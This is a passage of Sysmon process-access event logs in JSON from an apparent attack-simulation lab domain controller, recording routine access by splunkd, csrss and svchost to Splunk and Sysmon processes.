AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:01:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6206,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:43.382\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-2167-5F25-0000-001053850900}\r\nTargetProcessId: 1476\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:43.382","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-2167-5F25-0000-001053850900}","TargetProcessId":"1476","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6207,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:43.382\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2167-5F25-0000-001053850900}\r\nTargetProcessId: 1476\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:43.382","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2167-5F25-0000-001053850900}","TargetProcessId":"1476","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:01:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6208,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:43.382\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:43.382","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6209,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:43.382\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:43.382","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6210,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:43.382\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:43.382","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6211,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:43.382\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:43.382","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6212,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:43.382\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:43.382","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6213,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:43.382\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:43.382","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
